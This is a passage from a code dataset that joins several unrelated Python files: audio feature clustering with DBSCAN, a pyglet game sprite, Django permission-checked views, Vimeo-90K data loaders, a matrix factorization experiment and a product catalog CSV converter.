roll_off.shape)\r\n\"\"\"\r\nCentroid\r\n\"\"\"\r\ncentroid=librosa.feature.spectral_centroid(S=absolute_value, sr=sr_librosa)\r\nprint(\"Centroid = \", centroid.shape)\r\n\"\"\"\r\nRMS Energy\r\n\"\"\"\r\nif(sr_librosa==32000):\r\n frame_len = 800\r\nelif(sr_librosa==24000):\r\n frame_len = 600\r\nrms = librosa.feature.rms(S=absolute_value, frame_length=frame_len)\r\nprint(\"RMSE = \", rms.shape)\r\nlibrosa.display.specshow(rms, x_axis='time', y_axis='chroma', hop_length=512, cmap='coolwarm')\r\nplt.show()\r\n\"\"\"\r\nNormalize features\r\n\"\"\"\r\nmfcc = StandardScaler().fit_transform(mfcc_librosa)\r\nprint(np.mean(mfcc), np.std(mfcc))\r\nchromagram = StandardScaler().fit_transform(chromagram)\r\nprint(np.mean(chromagram), np.std(chromagram))\r\n\"\"\"\r\nConcatinate features\r\n\"\"\"\r\n#total_features = np.concatenate((mfcc.T, chromagram, roll_off, centroid), axis=0)\r\ntotal_features = np.concatenate((mfcc.T, chromagram.T, roll_off.T, centroid.T, rms.T), axis=1)\r\nprint(total_features.shape)\r\n\"\"\"\r\n\"\"\"\r\n#PCA for 2D Cluster Plot\r\n\"\"\"\r\npca_features_db = PCA(n_components=20)\r\nprincipalcomp_db = pca_features_db.fit_transform(total_features)\r\nprint(principalcomp_db.shape)\r\n\"\"\"\r\n\"\"\"\r\nFinding eps\r\n\"\"\"\r\nnbrs = NearestNeighbors(n_neighbors=2, algorithm='ball_tree').fit(total_features)\r\ndistances, indices = nbrs.kneighbors(total_features)\r\nmean_dist = distances.mean()\r\nprint(distances)\r\nprint(mean_dist)\r\ndistances = np.sort(distances, axis=0)\r\ndistances = distances[:,1]\r\nplt.plot(distances)\r\nplt.show()\r\n\r\n\"\"\"\r\nDBScan\r\n\"\"\"\r\nmodel = DBSCAN(eps=81., min_samples=33)\r\nmodel.fit(total_features)\r\n\r\nprint(model.labels_)\r\nprint(model.labels_.shape)\r\ndbscan_dict = Counter(model.labels_)\r\n\r\n\"\"\"\r\nExpand Labels to Audio Size\r\n\"\"\"\r\nexpanded_db_coeff = np.empty(len(audio))\r\nindex = 0\r\nfor i in range(len(model.labels_)):\r\n for x in range(int(len(audio)/len(mfcc_librosa.T))-1):\r\n expanded_db_coeff[index]=model.labels_[i]\r\n index+=1\r\nprint(expanded_db_coeff.shape)\r\n\r\n\"\"\"\r\nPCA for 2D Cluster Plot\r\n\"\"\"\r\npca_features = PCA(n_components=2)\r\nprincipalcomp = pca_features.fit_transform(total_features)\r\nprint(principalcomp.shape)\r\n\"\"\"\r\n\"\"\"\r\n#2D Cluster Plot PCA\r\n\"\"\"\r\nplt.figure()\r\nplt.figure(figsize=(10,10))\r\nplt.xticks(fontsize=12)\r\nplt.yticks(fontsize=14)\r\nplt.xlabel('Principal Component - 1',fontsize=20)\r\nplt.ylabel('Principal Component - 2',fontsize=20)\r\nplt.title(\"Principal Component Analysis\",fontsize=20)\r\nfor index in range(len(model.labels_)):\r\n if(model.labels_[index]==-1):\r\n plt.scatter(principalcomp[index, 0], principalcomp[index, 1], color='red', s=50)\r\n else:\r\n plt.scatter(principalcomp[index, 0], principalcomp[index, 1], color='blue', s=50)\r\nplt.show()\r\n\"\"\"\r\n\"\"\"\r\nTSNE for 2D Cluster Plot\r\n\"\"\"\r\ntsne_features = TSNE(n_components=2)\r\ntsnefit = tsne_features.fit_transform(total_features)\r\nprint(tsnefit.shape)\r\n\"\"\"\r\n\"\"\"\r\n#2D Cluster Plot TSNE\r\n\"\"\"\r\nplt.figure()\r\nplt.figure(figsize=(10,10))\r\nplt.xticks(fontsize=12)\r\nplt.yticks(fontsize=14)\r\nplt.xlabel('TSNE Component - 1',fontsize=20)\r\nplt.ylabel('TSNE Component - 2',fontsize=20)\r\nplt.title(\"TSNE Component Analysis\",fontsize=20)\r\nfor index in range(len(model.labels_)):\r\n if(model.labels_[index]==-1):\r\n plt.scatter(tsnefit[index, 0], tsnefit[index, 1], color='red', s=50)\r\n else:\r\n plt.scatter(tsnefit[index, 0], tsnefit[index, 1], color='blue', s=50)\r\nplt.show()\r\n\"\"\"\r\nplt.scatter(principalcomp[:,0], principalcomp[:,1], c=model.labels_, cmap=plt.cm.jet)\r\nplt.show()\r\nplt.scatter(tsnefit[:,0], tsnefit[:,1], c=model.labels_, cmap=plt.cm.jet)\r\nplt.show()\r\n\r\n\"\"\"\r\nLabeled Audio\r\n\"\"\"\r\nplt.scatter(t,audio,c=expanded_db_coeff, linestyle='-', linewidths=0.5)\r\nplt.show()\r\nprint(dbscan_dict)\r\ndbscan_keys = list(dbscan_dict.keys())\r\nprint(dbscan_keys)\r\n\r\n\"\"\"\r\n#Audio Snippets for check\r\n\"\"\"\r\nfor i in range(len(dbscan_keys)):\r\n value = dbscan_keys[i]\r\n audio_title = 'audio_snippet_' + str(value) +'.wav'\r\n print(audio_title)\r\n audio_snippet = np.empty(len(audio))\r\n for x in range(len(expanded_db_coeff)):\r\n if(expanded_db_coeff[x]==value):\r\n audio_snippet[x] = audio_librosa[x]\r\n else:\r\n audio_snippet[x] = 0\r\n audio_path = 'F:/Neural Systems Project/Code/DBScan/Output/' + audio_title\r\n librosa.output.write_wav(audio_path, audio_snippet, sr_librosa)\r\n\r\n\r\n","sub_path":"main/DBScan.py","file_name":"DBScan.py","file_ext":"py","file_size_in_byte":11502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"466918859","text":"import pyglet\nfrom system.component import Component\nimport config\n\nclass Ball(Component):\n\n def __init__(self, *args, **kwargs):\n super(Ball, self).__init__(*args,**kwargs)\n self.speed = kwargs.get('speed', 5)\n self.ball_image = pyglet.image.load('assets\\\\ball.png')\n self.width = self.ball_image.width\n self.height = self.ball_image.height\n self.ball_sprite = pyglet.sprite.Sprite(self.ball_image,self.x,self.y)\n self.x_direction = 1\n self.y_direction = 1\n\n print(\"Ball Created!\")\n\n def update_self(self):\n\n self.x += (self.speed * self.x_direction)\n self.y += (self.speed * self.y_direction)\n self.ball_sprite.set_position(self.x,self.y)\n\n if(self.x < 0 or (self.x + self.width) > config.window_width):\n self.x_direction *= -1\n\n if(self.y < 0 or (self.y + self.width) > config.window_height):\n self.y_direction *= -1\n\n def draw_self(self):\n self.ball_sprite.draw()\n","sub_path":"pyglet-tutorials/pyglet-game-tutorial/entities/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"472290456","text":"import time\n\n\ndef calc(results):\n for line in results:\n time.sleep(1)\n yield len(line)\n\n\ndef gen_count_line(f):\n results = []\n for line in f:\n results.append(line)\n return calc(results)\n\n\ndef call_in_with():\n with open('README.md') as f:\n results = gen_count_line(f)\n print('1:', time.time())\n print(results)\n print('2:', time.time())\n for i in results:\n print(i)\n print('3:', time.time())\n\n\nif __name__ == '__main__':\n call_in_with()\n","sub_path":"17-futures/my_demo.py","file_name":"my_demo.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"204131660","text":"import datetime, time\nimport pytimber\nfrom numpy import *\nfrom pytimber.pagestore import *\n\ndb=pytimber.LoggingDB()\n\ndata1=db.get('LHC.BOFSU:BPM_CAL_MAPPING_ERRORS',time.time()-3600*24*30,time.time())\n\nprint([v.dtype for v in data1.values()[0][1]])\n\ndata2=db.get(['CPS.TGM:USER'], datetime.datetime(2016,8,3,8), datetime.datetime(2016,8,3,8,20))\n\nprint(data2.values()[0][1].dtype)\n\ndb=PageStore('test.db','testdata')\n\nname='var'\nidx=range(3)\nrec=['123','232','123']\ndb.store_variable(name,idx,rec)\nprint(db.get_variable('var'))\n\nrec=['123','232','333123441']\ndb.store_variable(name,idx,rec)\nprint(db.get_variable('var'))\n\nrec=array(['123','232','333'],dtype='U')\ndb.store_variable(name,idx,rec)\nprint(db.get_variable('var'))\n\nrec=[['123','123412'],['232','4241','fdasfa'],['333','434123']]\n\ndb.store_variable(name,idx,rec)\nprint(db.get_variable('var'))\n\ndb.delete()\n","sub_path":"tests/test_string.py","file_name":"test_string.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"105134292","text":"from django.shortcuts import render\r\nfrom django.views.decorators.http import require_POST\r\nfrom django.http import JsonResponse\r\nfrom django.forms import ModelForm\r\nfrom django.db.models import Q\r\nimport logging\r\nfrom common.service.util import field_names, get_form_error_msg\r\nfrom common.forms import GridSearchForm, GridDeleteForm\r\nfrom auth.models import AuthResult\r\nfrom auth.permission import permission_required\r\nfrom auth.service.authresult import AuthResultService\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\n@permission_required('auth.result_view')\r\ndef result_search(request):\r\n return render(request, 'auth/result.html')\r\n\r\n\r\n@require_POST\r\n@permission_required('auth.result_view')\r\ndef result_list_data(request):\r\n try:\r\n search_form = GridSearchForm(request.POST)\r\n start, limit, sort_property, sort_direction = search_form.get_search_data()\r\n result_query = AuthResult.objects.all()\r\n # extra filters here\r\n result_query = result_query.values('app__app_name', 'res_label', 'resource__res_name', 'user__login_name', 'user__nick_name', 'group__group_code', 'group__group_name')\r\n if sort_property is not None:\r\n result_query = result_query.order_by(sort_direction + sort_property)\r\n total_count = result_query.count()\r\n result_list = list(result_query[start: start + limit])\r\n return JsonResponse({'total': total_count, 'rows': result_list})\r\n except Exception as exp:\r\n logger.exception(exp)\r\n return JsonResponse({'success': False, 'message': '加载数据失败!详细:%s' % exp})\r\n\r\n\r\n@require_POST\r\n@permission_required('auth.result_regenerate')\r\ndef result_regenerate(request):\r\n try:\r\n auth_result_service = AuthResultService()\r\n auth_result_service.refresh_all_result()\r\n return JsonResponse({'success': True, 'message': '重新生成成功!'})\r\n except Exception as exp:\r\n logger.exception(exp)\r\n return JsonResponse({'success': False, 'message': '重新生成失败!详细:%s' % exp})\r\n","sub_path":"auth/views/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"210989483","text":"import glob\nimport random\nimport torch\nimport os.path as op\nimport numpy as np\nfrom cv2 import cv2\nfrom torch.utils import data as data\nfrom utils import FileClient, paired_random_crop, augment, totensor, import_yuv\n\n\ndef _bytes2img(img_bytes):\n img_np = np.frombuffer(img_bytes, np.uint8)\n img = np.expand_dims(cv2.imdecode(img_np, cv2.IMREAD_GRAYSCALE), 2) # (H W 1)\n img = img.astype(np.float32) / 255.\n return img\n\n\nclass Vimeo90KDataset(data.Dataset):\n \"\"\"Vimeo-90K dataset.\n\n For training data: LMDB is adopted. See create_lmdb for details.\n \n Return: A dict includes:\n img_lqs: (T, [RGB], H, W)\n img_gt: ([RGB], H, W)\n key: str\n \"\"\"\n def __init__(self, opts_dict, radius):\n super().__init__()\n\n self.opts_dict = opts_dict\n \n # dataset paths\n self.gt_root = op.join(\n 'data/vimeo90k/', \n self.opts_dict['gt_path']\n )\n self.lq_root = op.join(\n 'data/vimeo90k/', \n self.opts_dict['lq_path']\n )\n\n # extract keys from meta_info.txt\n self.meta_info_path = op.join(\n self.gt_root, \n 'meta_info.txt'\n )\n with open(self.meta_info_path, 'r') as fin:\n self.keys = [line.split(' ')[0] for line in fin]\n\n # define file client\n self.file_client = None\n self.io_opts_dict = dict() # FileClient needs\n self.io_opts_dict['type'] = 'lmdb'\n self.io_opts_dict['db_paths'] = [\n self.lq_root, \n self.gt_root\n ]\n self.io_opts_dict['client_keys'] = ['lq', 'gt']\n\n # generate neighboring frame indexes\n # indices of input images\n # radius | nfs | input index\n # 0 | 1 | 4, 4, 4 # special case, for image enhancement\n # 1 | 3 | 3, 4, 5\n # 2 | 5 | 2, 3, 4, 5, 6 \n # 3 | 7 | 1, 2, 3, 4, 5, 6, 7\n # no more! septuplet sequences!\n if radius == 0:\n self.neighbor_list = [4, 4, 4] # always the im4.png\n else:\n nfs = 2 * radius + 1\n self.neighbor_list = [i + (9 - nfs) // 2 for i in range(nfs)]\n\n def __getitem__(self, index):\n if self.file_client is None:\n self.file_client = FileClient(\n self.io_opts_dict.pop('type'), **self.io_opts_dict\n )\n # random reverse\n if self.opts_dict['random_reverse'] and random.random() < 0.5:\n self.neighbor_list.reverse()\n\n # ==========\n # get frames\n # ==========\n\n # get the GT frame (im4.png)\n gt_size = self.opts_dict['gt_size']\n key = self.keys[index]\n clip, seq, _ = key.split('/') # key example: 00001/0001/im1.png\n\n img_gt_path = key\n img_bytes = self.file_client.get(img_gt_path, 'gt')\n img_gt = _bytes2img(img_bytes) # (H W 1)\n\n # get the neighboring LQ frames\n img_lqs = []\n for neighbor in self.neighbor_list:\n img_lq_path = f'{clip}/{seq}/im{neighbor}.png'\n img_bytes = self.file_client.get(img_lq_path, 'lq')\n img_lq = _bytes2img(img_bytes) # (H W 1)\n img_lqs.append(img_lq)\n\n # ==========\n # data augmentation\n # ==========\n \n # randomly crop\n img_gt, img_lqs = paired_random_crop(\n img_gt, img_lqs, gt_size, img_gt_path\n )\n\n # flip, rotate\n img_lqs.append(img_gt) # gt joint augmentation with lq\n img_results = augment(\n img_lqs, self.opts_dict['use_flip'], self.opts_dict['use_rot']\n )\n\n # to tensor\n img_results = totensor(img_results)\n img_lqs = torch.stack(img_results[0:-1], dim=0)\n img_gt = img_results[-1]\n\n return {\n 'lq': img_lqs, # (T [RGB] H W)\n 'gt': img_gt, # ([RGB] H W)\n }\n\n def __len__(self):\n return len(self.keys)\n\n\nclass VideoTestVimeo90KDataset(data.Dataset):\n \"\"\"\n Video test dataset for Vimeo-90K.\n\n For validation data: Disk IO is adopted.\n \n Only test the center frame.\n \"\"\"\n def __init__(self, opts_dict, radius):\n super().__init__()\n\n assert radius != 0, \"Not implemented!\"\n \n self.opts_dict = opts_dict\n\n # dataset paths\n self.gt_root = op.join(\n 'data/vimeo90k/', \n self.opts_dict['gt_path']\n )\n self.lq_root = op.join(\n 'data/vimeo90k/', \n self.opts_dict['lq_path']\n )\n self.meta_info_path = op.join(\n 'data/vimeo90k/', \n self.opts_dict['meta_path']\n )\n \n # record data info for loading\n self.data_info = {\n 'lq_path': [],\n 'gt_path': [],\n 'gt_index': [], \n 'lq_indexes': [], \n 'h': [], \n 'w': [], \n 'index_vid': [], \n 'name_vid': [], \n }\n\n gt_path_list = []\n meta_fp = open(self.meta_info_path, 'r')\n while True:\n new_line = meta_fp.readline().split('\\n')[0]\n if new_line == '':\n break\n vid_name = new_line.split('/')[0] + '_' + new_line.split('/')[1]\n gt_path = op.join(\n self.gt_root, vid_name + '.yuv'\n )\n gt_path_list.append(gt_path)\n \n self.vid_num = len(gt_path_list)\n for idx_vid, gt_vid_path in enumerate(gt_path_list):\n name_vid = gt_vid_path.split('/')[-1]\n w, h = 448, 256\n lq_vid_path = op.join(\n self.lq_root,\n name_vid\n )\n lq_indexes = list(range(0, 7))\n self.data_info['index_vid'].append(idx_vid)\n self.data_info['gt_path'].append(gt_vid_path)\n self.data_info['lq_path'].append(lq_vid_path)\n self.data_info['name_vid'].append(name_vid)\n self.data_info['w'].append(w)\n self.data_info['h'].append(h)\n self.data_info['gt_index'].append(3)\n self.data_info['lq_indexes'].append(lq_indexes)\n\n def __getitem__(self, index):\n # get gt frame\n img = import_yuv(\n seq_path=self.data_info['gt_path'][index], \n yuv_type='444p', \n h=self.data_info['h'][index],\n w=self.data_info['w'][index],\n tot_frm=1,\n start_frm=self.data_info['gt_index'][index],\n only_y=True\n )\n img_gt = np.expand_dims(\n np.squeeze(img), 2\n ).astype(np.float32) / 255. # (H W 1)\n\n # get lq frames\n img_lqs = []\n for lq_index in self.data_info['lq_indexes'][index]:\n img = import_yuv(\n seq_path=self.data_info['lq_path'][index], \n yuv_type='444p', \n h=self.data_info['h'][index],\n w=self.data_info['w'][index],\n tot_frm=1,\n start_frm=lq_index,\n only_y=True\n )\n img_lq = np.expand_dims(\n np.squeeze(img), 2\n ).astype(np.float32) / 255. # (H W 1)\n img_lqs.append(img_lq)\n\n # no any augmentation\n\n # to tensor\n img_lqs.append(img_gt)\n img_results = totensor(img_lqs)\n img_lqs = torch.stack(img_results[0:-1], dim=0)\n img_gt = img_results[-1]\n\n return {\n 'lq': img_lqs, # (T 1 H W)\n 'gt': img_gt, # (1 H W)\n 'name_vid': self.data_info['name_vid'][index], \n 'index_vid': self.data_info['index_vid'][index], \n }\n\n def __len__(self):\n return len(self.data_info['gt_path'])\n\n def get_vid_num(self):\n return self.vid_num\n","sub_path":"dataset/vimeo90k.py","file_name":"vimeo90k.py","file_ext":"py","file_size_in_byte":7852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"130007580","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\nfrom patchwork.feature._multitask import _encode_classes, _dataframe_to_classes\nfrom patchwork.feature._multitask import _assemble_full_network\n\n\ndef test_encode_classes():\n train = pd.Series([\"foo\", \"bar\", \"bar\", np.nan])\n val = pd.Series([\"bar\", \"bar\"])\n \n train_ind, val_ind, classes = _encode_classes(train, val)\n \n assert len(classes) == 2\n for c in [\"foo\", \"bar\"]:\n assert c in classes\n assert train_ind.shape[0] == len(train)\n assert val_ind.shape[0] == len(val)\n assert -1 in train_ind\n assert -1 not in val_ind\n \n \ndef test_dataframe_to_classes():\n train = pd.DataFrame({\n \"filepath\":[\"foo.png\", \"bar.png\", \"foobar.png\"],\n \"class0\":[\"a\", \"b\", \"c\"],\n \"class1\":[\"x\", \"y\", np.nan]\n })\n val = pd.DataFrame({\n \"filepath\":[\"foo1.png\", \"bar2.png\"],\n \"class0\":[\"a\", \"b\"],\n \"class1\":[\"x\", \"y\"]\n })\n outdict, class_dict = _dataframe_to_classes(train, val,\n [\"class0\", \"class1\"])\n \n assert len(outdict[\"train_files\"]) == len(train)\n assert len(outdict[\"val_files\"]) == len(val)\n \n assert outdict[\"train_indices\"].shape == (len(train),2)\n assert outdict[\"val_indices\"].shape == (len(val),2)\n assert -1 in outdict[\"train_indices\"]\n assert -1 not in outdict[\"val_indices\"]\n \n \ndef test_assemble_full_network():\n inpt = tf.keras.layers.Input((None, None, 3))\n net = tf.keras.layers.Conv2D(5, 3)(inpt)\n fcn = tf.keras.Model(inpt, net)\n \n task_dimensions = [2,3,4]\n model_dict, trainvars = _assemble_full_network(fcn,\n task_dimensions,\n shared_layers=[3,5],\n task_layers=[7,\"p\",11],\n train_fcn=False,\n global_pooling=\"max\")\n \n assert model_dict[\"fcn\"] is fcn\n assert len(model_dict[\"full\"].outputs) == 3\n for o,d in zip(model_dict[\"full\"].outputs, task_dimensions):\n assert o.shape[-1] == d\n assert isinstance(trainvars, list)","sub_path":"patchwork/tests/test_feature_multitask.py","file_name":"test_feature_multitask.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96899628","text":"from __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndata = np.genfromtxt('ratings.csv', delimiter=\",\")\n\n# not using timestamp\nX = np.delete(data[1:], 3, axis=1)\nprint(X.shape)\nprint(X)\nprint(np.amax(X[:, 1]))\nprint('max min rating: ', np.amax(X[:, 2]), np.amin(X[:, 2]))\n\n\nsort_objects = np.unique(X[:, 1])\nsort_users = np.unique(X[:, 0])\n\nfor i in range(X.shape[0]):\n X[i, 0] = np.where(sort_users == int(X[i, 0]))[0][0]\n X[i, 1] = np.where(sort_objects == int(X[i, 1]))[0][0]\n\nprint(X.shape)\nprint(X)\n# user and object max ids\nuser_max = int(np.amax(X[:, 0])) # user max index\nobject_max = int(np.amax(X[:, 1])) # object max index\nprint('Max user id: ', user_max)\nprint('Max movie id: ', object_max)\n\n\n#shuffling data\nnp.random.shuffle(X)\nprint(X)\nprint(X.shape)\n\n#setting train, val, test sets\nX_train = X[:60000]\nX_val = X[60000:80000]\nX_test = X[80000:]\nprint(X_train.shape, X_val.shape, X_test.shape)\n\ndef check_error(X, u, v):\n\n err = 0\n N = X.shape[0]\n for k in range(N):\n user_id = int(X[k, 0])\n object_id = int(X[k, 1])\n rating = int(X[k, 2])\n predict_rating = np.dot(u[user_id, :], v[object_id, :])\n err += np.absolute(predict_rating - rating)\n\n av_err = err / float(N)\n print('Average error: ', av_err)\n\n return av_err\n\ndef PMF(train_data, val_data, user_max_id, object_max_id, iterations=2, lam=2, sigma2=0.1, d=10):\n\n length = train_data.shape[0]\n mean = np.zeros(d)\n cov = (1/float(lam))*np.identity(d)\n L = np.zeros(iterations) #objective function\n Nu = user_max_id + 1 #int(np.amax(train_data[:, 0])) #user max index\n Nv = object_max_id + 1#int(np.amax(train_data[:, 1])) #object max index\n Mes = np.zeros((Nu, Nv)) #measured\n M = np.zeros((Nu, Nv)) #matrix of ratings\n train_err_list = []\n val_err_list = []\n\n for k in range(length):\n i = int(train_data[k, 0]) #- 1 maybe not needed if we index starting from 0\n j = int(train_data[k, 1]) #- 1\n Mes[i, j] = 1 #user ui rated movie vj\n M[i, j] = train_data[k, 2] #setting rating\n\n ##initialize locations and users\n u = np.zeros((iterations, Nu, d))\n v = np.zeros((iterations, Nv, d))\n v[0, :, :] = np.random.multivariate_normal(mean, cov, Nv) #initialize v as multivariate normal\n\n for k in range(iterations):\n print('Iteration: ', k+1, ' / ', iterations)\n\n ##update user location\n if k == 0:\n l = 0\n else:\n l = k-1\n\n for i in range(Nu):\n A = lam * sigma2 * np.identity(d)\n vec = np.zeros(d)\n for j in range(Nv):\n if Mes[i, j] == 1:\n A += np.outer(v[l, j, :], v[l, j, :])\n vec += M[i, j]*v[l, j, :]\n u[k, i, :] = np.dot(np.linalg.inv(A), vec)\n\n ##update object location\n for j in range(Nv):\n A = lam * sigma2 * np.identity(d)\n vec = np.zeros(d)\n for i in range(Nu):\n if Mes[i, j] == 1:\n A += np.outer(u[k, i, :], u[k, i, :])\n vec += M[i, j]*u[k, i, :]\n v[k, j, :] = np.dot(np.linalg.inv(A), vec)\n\n ##update objective function\n for i in range(Nu):\n for j in range(Nv):\n if Mes[i, j] == 1:\n L[k] -= np.square(M[i, j] - np.dot(u[k, i, :].T, v[k, j, :]))\n L[k] = (1/(2*sigma2))*L[k]\n L[k] -= (lam/float(2))*(np.square(np.linalg.norm(u[k, :, :])) + np.square(np.linalg.norm(v[k, :, :])))\n print('Loss: ', L[k])\n\n print('Training set:')\n train_err_list.append(check_error(train_data, u[k, :, :], v[k, :, :]))\n print('Validation set:')\n val_err_list.append(check_error(val_data, u[k, :, :], v[k, :, :]))\n\n return L, u, v, train_err_list, val_err_list\n\niterations = 1\ncount = 1\nbest_lam = -1\nbest_sigma2 = -1\nbest_av_err_val = 100\nbest_train_err_list = None\nbest_val_err_list = None\n\nfor i in range(count):\n print('Parameter iteration: ', i+1, ' / ', count)\n lam = 10**np.random.uniform(-1.5, 1.5)\n sigma2 = 10**np.random.uniform(-1.5, 0.5)\n print('lam:',lam, ' sigma2:', sigma2)\n L, u_matrices, v_matrices, train_err_list, val_err_list = PMF(X_train, X_val, user_max, object_max,\n iterations=iterations, lam=lam, sigma2=sigma2, d=10)\n u = u_matrices[iterations-1, :, :]\n v = v_matrices[iterations-1, :, :]\n correct_train = 0\n\n # append training set error\n\n av_err_train = train_err_list[iterations-1]\n\n # append validation set error\n\n av_err_val = val_err_list[iterations-1]\n\n if av_err_val < best_av_err_val:\n best_av_err_val = av_err_val\n best_lam = lam\n best_sigma2 = sigma2\n best_train_err_list = train_err_list\n best_val_err_list = val_err_list\n\n# best_lam = 4.34\n# best_sigma2 = 0.8\niterations = 3\nprint('best_lam:', best_lam, ' best_sigma2:', best_sigma2)\nprint('Best validation set error: ', best_av_err_val)\nL, u_matrices, v_matrices, train_err_list, val_err_list = PMF(X_train, X_val, user_max, object_max,\n iterations=iterations, lam=lam, sigma2=sigma2, d=10)\n\nL = -L\nplt.subplot(2, 1, 1)\nplt.title('Training loss')\nplt.xlabel('Iteration')\nplt.plot(L, '-o')\n\nplt.subplot(2, 1, 2)\nplt.title('Training and validation error')\nplt.xlabel('Iteration')\nplt.plot(train_err_list, '-o', label='training error')\nplt.plot(val_err_list, '-o', label='validation error')\n\nplt.gcf().set_size_inches(12, 12)\nplt.show()\n\nu = u_matrices[iterations-1, :, :]\nv = v_matrices[iterations-1, :, :]\nprint('Test set: ')\ncheck_error(X_test, u, v)\n\n\n","sub_path":"projects/pmf/hw4_PMF.py","file_name":"hw4_PMF.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"550058735","text":"#!/usr/bin/env python\n# -*- coding: cp1251 -*-\n##\n# Arguments: 1 - input, 2 - output\n##\nimport csv\nimport sys\n\ncategory_map = {\n \"Шубы и меха\":(\"wfurs\",129,284),\n \"Дубленки\":(\"wskincoat\",136,284),\n \"Пуховики\":(\"wpaddedcoat\",142,284),\n \"Аксессуары\":(\"waccessories\",285,284),\n \"Куртки\":(\"wtopjacket\",296,284),\n \"Пальто\":(\"wtopcoat\",297,284),\n \"Блузки и рубашки\":(\"wblouse\",300,284),\n \"Брюки и джинсы\":(\"wpants\",301,284),\n \"Жакеты и жилеты\":(\"wjacket\",302,284),\n \"Платья\":(\"wdress\",303,284),\n \"Юбки\":(\"wskirt\",305,284),\n \"Кожаные куртки\":(\"wleathertopjacket\",316,284),\n \"Кожаные пальто и плащи\":(\"wleathertopcoat\",317,284),\n \"Туники\":(\"wtunic\",475,284),\n \"Кардиганы и джемперы\":(\"wcardigan\",476,284),\n \"Футболки и топы\":(\"wtshort\",477,284),\n \"Кожаные куртки зимние\":(\"wwleathertopjacket\",493,284),\n \"Одежда\":(\"wclothes\",299,284),\n \"Трикотаж\":(\"wtrico\",304,284),\n \"Плащи\":(\"wtopcloak\",326,284),\n \"Ветровки\":(\"wwindbreaker\",328,284),\n \"Шорты и комбинезоны\":(\"wshorts\",478,284),\n \"Пляжная одежда и купальники\":(\"zhenskie_kupalniki\",490,284),\n \"Дубленки\":(\"mskincoat\",156,306),\n \"Пуховики\":(\"mpaddedcoat\",160,306),\n \"Аксессуары\":(\"maccessories\",307,306),\n \"Куртки\":(\"mtopjacket\",310,306),\n \"Пальто\":(\"mtopcoat\",311,306),\n \"Брюки и джинсы\":(\"mpants\",313,306),\n \"Рубашки\":(\"mshirt\",314,306),\n \"Кардиганы и джемперы\":(\"mtrico\",315,306),\n \"Кожаные куртки\":(\"mleathertopjacket\",318,306),\n \"Плащи\":(\"mtopcloak\",327,306),\n \"Футболки\":(\"mtshort\",417,306),\n \"Пиджаки \":(\"mblazer\",480,306),\n \"Куртки зимние кожаные\":(\"mwleathertopjacket\",483,306),\n \"Одежда\":(\"mclothes\",312,306),\n \"Ветровки\":(\"mwindbreaker\",329,306),\n \"Шорты\":(\"mshorts\",418,306),\n \"Пляжная одежда и купальники\":(\"muzhskie_plavki_shorti\",491,306),\n \"Выгодное предложение\":(\"wfurs_bestsell\",494,495),\n \"Женская коллекция\":(\"woman_sale\",496,495),\n \"Мужская коллекция\":(\"man_sale\",497,495)}\n#\n# \"Женская коллекция\":(284,284,\"collection\"),\n# \"Мужская коллекция\":(306,306,\"collection\"),\n# \"Предметы интерьера\":(\"home_accessories\",492,\"collection\"),\n# \"Распродажа\":(495,495,\"collection\"),\n# \"Новинки\":(\"new\",511,\"collection\")}\nbrands = dict()\nwith open(\"brands.csv\") as brands_csv:\n reader = csv.reader(brands_csv, delimiter=\";\")\n next(reader, None) # skip header\n brands = dict((rows[0],rows[1]) for rows in reader)\n\nwith open(sys.argv[1]) as csvfile:\n reader = csv.DictReader(csvfile, delimiter=\";\")\n with open(sys.argv[2], \"w\") as csv_out:\n writer = csv.DictWriter(csv_out, quoting=csv.QUOTE_NONNUMERIC, fieldnames=[\"IE_XML_ID\", \"IE_NAME\", \"IP_PROP9\", \"IE_ACTIVE\", \"IP_PROP3\", \"IMAGE_URL\", \"URL\", \"ALLCATS\", \"LEAFCAT\", \"BRAND\"], extrasaction=\"ignore\", delimiter=\";\")\n writer.writeheader()\n for row in reader:\n if row[\"IC_GROUP1\"] != \"\" and row[\"IC_GROUP2\"] != \"\":\n d = row\n d[\"IE_NAME\"] = \"{0}, {1:.0f}р.\".format(d[\"IE_NAME\"], float(d[\"IP_PROP3\"]))\n d[\"IMAGE_URL\"] = \"http://snowqueen.ru{0}\".format(d[\"IE_PREVIEW_PICTURE\"])\n category = category_map[row[\"IC_GROUP2\"]]\n d[\"URL\"] = \"http://snowqueen.ru/collection/{0}/{1}/\".format(category[0], row[\"IE_ID\"])\n d[\"ALLCATS\"] = \"|\".join(map(str, [category[2], category[1]]))\n d[\"LEAFCAT\"] = str(category[1])\n d[\"BRAND\"] = brands[row[\"IP_PROP2\"]].strip() if row[\"IP_PROP2\"] in brands else \"\"\n writer.writerow(d)\n","sub_path":"feeder/script/postprocess_catalog.py","file_name":"postprocess_catalog.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"298068670","text":"#%%\r\n\r\n#Feature selection algorithm class \r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.preprocessing import StandardScaler, Normalizer\r\nfrom sklearn.feature_selection import mutual_info_classif, mutual_info_regression, f_regression\r\n \r\n#%%\r\n\r\nclass FeatureSelector():\r\n def __init__(self, df, target_col):\r\n self.df = df.dropna()\r\n self.df = 